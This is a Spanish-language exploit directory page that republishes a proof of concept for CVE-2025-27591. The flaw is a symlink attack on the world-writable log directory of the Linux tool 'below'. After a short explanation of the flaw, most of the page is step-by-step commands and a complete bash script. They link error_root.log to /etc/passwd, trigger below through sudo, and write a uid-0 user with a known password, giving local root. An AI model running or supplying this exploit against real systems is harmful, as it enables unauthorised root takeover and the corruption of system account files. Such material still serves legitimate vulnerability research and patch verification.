Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-27591-below- — Escalada de Privilegios Local vía `below` (CVE-2025-27591) - PoC Exploit | Kitploit
Herramientas/GitHubGitHub/visaicyber/cve-2025-27591-below-
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónMala Configuración
GitHubvisaicyber/cve-2025-27591-below-

CVE-2025-27591-below-

Escalada de Privilegios Local vía `below` (CVE-2025-27591) - PoC Exploit

Ver Repositorio
21hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-27591 – Escalada de privilegios en Below

1) Introducción

Below es una herramienta de Linux para registrar y mostrar datos del sistema como uso de hardware y métricas de cgroups.

En versiones anteriores a v0.9.0, el servicio systemd de Below se ejecuta con privilegios de root y crea directorios y archivos de registro escribibles por cualquier usuario bajo /var/log/below. Esta configuración insegura permite ataques de enlace simbólico que permiten a un usuario local sin privilegios escalar privilegios a root.

A este problema se le asignó CVE-2025-27591.
El desarrollador upstream lo corrigió en v0.9.0.


2) Vulnerabilidad – Ataque de enlace simbólico en /var/log/below

  • Below asegura que /var/log/below tenga permisos 0777 en tiempo de ejecución.
  • También crea /var/log/below/error_root.log con permisos 0666.
  • Debido a que el directorio es escribible por cualquier usuario, un atacante puede reemplazar el archivo de registro con un enlace simbólico a cualquier archivo sensible (por ejemplo, /etc/passwd).
  • Cuando Below escribe registros como root, en su lugar escribirá en el destino del enlace simbólico, permitiendo la escalada de privilegios.

Este comportamiento evita la protección protected_symlinks del kernel porque el bit sticky no está aplicado.


3) Explotación

Apuntando error_root.log a /etc/passwd, podemos inyectar un nuevo usuario root con una contraseña conocida.

Pasos

Paso 1: Crear una copia de seguridad de /etc/passwd. Siempre haz una copia de seguridad antes de modificar archivos del sistema:

root@kitploit:~
cp /etc/passwd /tmp/passwd.bak

Paso 2: Generar una entrada de usuario maliciosa

root@kitploit:~
HASH=$(openssl passwd -6 'rooted123')
echo "root2:$HASH:0:0:root:/root:/bin/bash" > /tmp/payload

Paso 3: Crear enlace simbólico al registro vulnerable

root@kitploit:~
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log

Paso 4: Provocar la creación del registro

root@kitploit:~
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

Paso 5: Sobrescribir /etc/passwd

root@kitploit:~
cat /tmp/payload > /var/log/below/error_root.log

Paso 6: Cambiar al nuevo usuario root

root@kitploit:~
su root2
# password: rooted123

4) Prueba de concepto (PoC): Ejecuta este script

root@kitploit:~
#!/bin/bash
# CVE-2025-27591 Exploit - Privilege Escalation via 'below'

TARGET="/etc/passwd"
LINK_PATH="/var/log/below/error_root.log"
TMP_PAYLOAD="/tmp/payload"
BACKUP="/tmp/passwd.bak"

echo "[*] CVE-2025-27591 Privilege Escalation Exploit"

# Check for sudo access to below
echo "[*] Checking sudo permissions..."
if ! sudo -l | grep -q '/usr/bin/below'; then
  echo "[!] 'below' is not available via sudo. Exiting."
  exit 1
fi

# Backup current /etc/passwd
echo "[*] Backing up /etc/passwd to $BACKUP"
cp /etc/passwd "$BACKUP"

# Generate password hash for 'root2' user (password: rooted123)
echo "[*] Generating password hash..."
HASH=$(openssl passwd -6 'rooted123')

# Prepare malicious passwd line
echo "[*] Creating malicious passwd line..."
echo "root2:$HASH:0:0:root:/root:/bin/bash" > "$TMP_PAYLOAD"

# Create symlink
echo "[*] Linking $LINK_PATH to $TARGET"
rm -f "$LINK_PATH"
ln -sf "$TARGET" "$LINK_PATH"

# Trigger log creation with invalid --time to force below to recreate the log
echo "[*] Triggering 'below' to write to symlinked log..."
sudo /usr/bin/below replay --time "invalid" >/dev/null 2>&1

# Overwrite passwd file via symlink
echo "[*] Injecting malicious user into /etc/passwd"
cat "$TMP_PAYLOAD" > "$LINK_PATH"

# Test access
echo "[*] Try switching to 'root2' using password: rooted123"
su root2
CVE-2025-27591
Descargar herramienta